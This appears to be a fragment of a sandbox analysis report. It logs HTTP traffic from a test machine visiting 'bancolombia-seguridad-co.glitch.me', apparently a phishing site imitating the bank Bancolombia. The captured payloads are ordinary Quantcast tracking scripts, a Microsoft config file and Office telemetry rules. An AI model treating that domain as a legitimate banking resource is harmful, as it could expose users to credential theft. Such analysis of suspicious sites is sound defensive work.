                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 7ed0982309781d390a105a3ead66dbfa.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                          X-Amz-Cf-Id: JpyRX5KKwORvJrod893a--cLUGQSDW5DYaYN-8vHn7AaHB3OMSge3A==
                                                                                                                          2024-10-13 16:20:45 UTC160INData Raw: 2f 2a 0a 20 51 75 61 6e 74 63 61 73 74 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 74 61 67 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 32 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 0a 2a 2f 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 5f 5f 71 63 28 22 72 75 6c 65 73 22 2c 5b 61 5d 29 7d 29 28 22 70 2d 64 35 78 32 75 44 56 48 64 37 41 4c 45 22 2c 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b
                                                                                                                          Data Ascii: /* Quantcast measurement tag Copyright (c) 2008-2022, Quantcast Corp.*/'use strict';(function(a,b,c){__qc("rules",[a])})("p-d5x2uDVHd7ALE",window,document);


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449763184.28.90.27443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:45 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Range: bytes=0-2147483646
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-10-13 16:20:45 UTC515INHTTP/1.1 200 OK
                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                          X-CID: 11
                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                          Cache-Control: public, max-age=174231
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:45 GMT
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2
                                                                                                                          2024-10-13 16:20:45 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.44976691.228.74.2004432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:45 UTC353OUTGET /quant.js HTTP/1.1
                                                                                                                          Host: secure.quantserve.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:45 UTC295INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:45 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Content-Length: 23930
                                                                                                                          Connection: close
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Cache-Control: private, max-age=604800
                                                                                                                          Etag: "HP/dXILNCv8vRT01LqWQOg=="
                                                                                                                          Expires: Sun, 20 Oct 2024 16:20:45 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-10-13 16:20:45 UTC16089INData Raw: 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 33 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 75 61 6e 74 63 61 73 74 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 71 63 53 65 73 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 72 28 29 3b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 28 65 2b 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 25 31 36 7c 30 3b
                                                                                                                          Data Ascii: /* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;
                                                                                                                          2024-10-13 16:20:45 UTC7841INData Raw: 29 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3d 5b 5d 3b 69 66 28 21 28 6a 65 3e 30 29 29 7b 66 6f 72 28 65 20 69 6e 20 54 28 29 2c 44 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 44 65 2c 65 29 26 26 44 65 5b 65 5d 26 26 28 74 3d 44 65 5b 65 5d 2c 6e 2e 70 75 73 68 28 74 29 2c 64 65 6c 65 74 65 20 44 65 5b 65 5d 29 3b 69 66 28 31 3d 3d 6e 2e 6c 65 6e 67 74 68 26 26 77 28 6e 5b 30 5d 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 29 66 6f 72 28 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 77 28 6e 5b 65 5d 29 7d 7d 2c 65 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 3d 5b 5d 3b 66 6f 72 28 6e 3d 4f 65 2e 73 6c 69 63 65 28 30 29
                                                                                                                          Data Ascii: )},K=function(){var e,t,n=[];if(!(je>0)){for(e in T(),De)Object.prototype.hasOwnProperty.call(De,e)&&De[e]&&(t=De[e],n.push(t),delete De[e]);if(1==n.length&&w(n[0]),n.length>1)for(e=0;e<n.length;e++)w(n[e])}},ee=function(){var e,t,n,r=[];for(n=Oe.slice(0)


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.44976918.66.102.664432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:46 UTC368OUTGET /rules-p-d5x2uDVHd7ALE.js HTTP/1.1
                                                                                                                          Host: rules.quantcount.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:46 UTC644INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Content-Length: 160
                                                                                                                          Connection: close
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:46 GMT
                                                                                                                          Last-Modified: Thu, 13 Oct 2022 22:55:53 GMT
                                                                                                                          ETag: "ceee564f54e512a948f918e2710eab6e"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: GET
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 367a4718be97a49df7ac0500a986437a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                          X-Amz-Cf-Id: ixg0dlCKM55G86DYm6PL5hh1uupl8HUibKVQyR_lYOSph-KZOcv9wg==
                                                                                                                          Age: 1
                                                                                                                          2024-10-13 16:20:46 UTC160INData Raw: 2f 2a 0a 20 51 75 61 6e 74 63 61 73 74 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 74 61 67 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 32 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 0a 2a 2f 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 5f 5f 71 63 28 22 72 75 6c 65 73 22 2c 5b 61 5d 29 7d 29 28 22 70 2d 64 35 78 32 75 44 56 48 64 37 41 4c 45 22 2c 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b
                                                                                                                          Data Ascii: /* Quantcast measurement tag Copyright (c) 2008-2022, Quantcast Corp.*/'use strict';(function(a,b,c){__qc("rules",[a])})("p-d5x2uDVHd7ALE",window,document);


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.44977091.228.74.1664432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:46 UTC940OUTGET /pixel;r=495991433;source=gtm;rf=0;a=p-d5x2uDVHd7ALE;url=http%3A%2F%2Fbancolombia-seguridad-co.glitch.me%2F;ns=0;ce=1;qjs=1;qv=fd657345-20240925114642;ref=;d=bancolombia-seguridad-co.glitch.me;dst=1;et=1728836445054;tzo=240;ogl=;ses=f8a615bd-1eec-46c0-bb58-164a7f33c360;uht=2;fpan=1;fpa=P0-1559252703-1728836443566;pbc=;cm=undefined;gdpr=0;mdl= HTTP/1.1
                                                                                                                          Host: pixel.quantserve.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:46 UTC592INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:46 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 35
                                                                                                                          Connection: close
                                                                                                                          Attribution-Reporting-Register-Trigger: {"event_trigger_data":[{"filters":[],"trigger_data":"1"}]}
                                                                                                                          Cache-Control: private, no-cache, no-store, proxy-revalidate
                                                                                                                          Expires: Fri, 04 Aug 1978 12:00:00 GMT
                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
                                                                                                                          Pragma: no-cache
                                                                                                                          Set-Cookie: mc=670bf35e-97790-96ec7-2d0a3; expires=Thu, 13-Nov-2025 16:20:46 GMT; path=/; domain=.quantserve.com; SameSite=None; Secure
                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                          2024-10-13 16:20:46 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 80 ff ff ff 00 00 00 02 02 44 01 00 3b
                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.44977191.228.74.2004432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:47 UTC726OUTGET /pixel;r=495991433;source=gtm;rf=0;a=p-d5x2uDVHd7ALE;url=http%3A%2F%2Fbancolombia-seguridad-co.glitch.me%2F;ns=0;ce=1;qjs=1;qv=fd657345-20240925114642;ref=;d=bancolombia-seguridad-co.glitch.me;dst=1;et=1728836445054;tzo=240;ogl=;ses=f8a615bd-1eec-46c0-bb58-164a7f33c360;uht=2;fpan=1;fpa=P0-1559252703-1728836443566;pbc=;cm=undefined;gdpr=0;mdl= HTTP/1.1
                                                                                                                          Host: pixel.quantserve.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: mc=670bf35e-97790-96ec7-2d0a3
                                                                                                                          2024-10-13 16:20:47 UTC454INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:47 GMT
                                                                                                                          Content-Type: image/gif
                                                                                                                          Content-Length: 35
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Attribution-Reporting-Register-Trigger: {"event_trigger_data":[{"filters":[],"trigger_data":"1"}]}
                                                                                                                          Cache-Control: private, no-cache, no-store, proxy-revalidate
                                                                                                                          Expires: Fri, 04 Aug 1978 12:00:00 GMT
                                                                                                                          Pragma: no-cache
                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                          2024-10-13 16:20:47 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 80 ff ff ff 00 00 00 02 02 44 01 00 3b
                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          16192.168.2.44977913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:32 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:32 UTC561INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:32 GMT
                                                                                                                          Content-Type: text/plain
                                                                                                                          Content-Length: 218853
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public
                                                                                                                          Last-Modified: Sun, 13 Oct 2024 10:59:53 GMT
                                                                                                                          ETag: "0x8DCEB762AD2C54E"
                                                                                                                          x-ms-request-id: 88bd8b3f-d01e-0049-5d65-1de7dc000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162132Z-17db6f7c8cfmhggkx889x958tc00000002bg000000005805
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:32 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                                                                          Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                                                                          Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                          Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                                                                          Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                                                                          Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                                                                          2024-10-13 16:21:32 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                                                                          Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
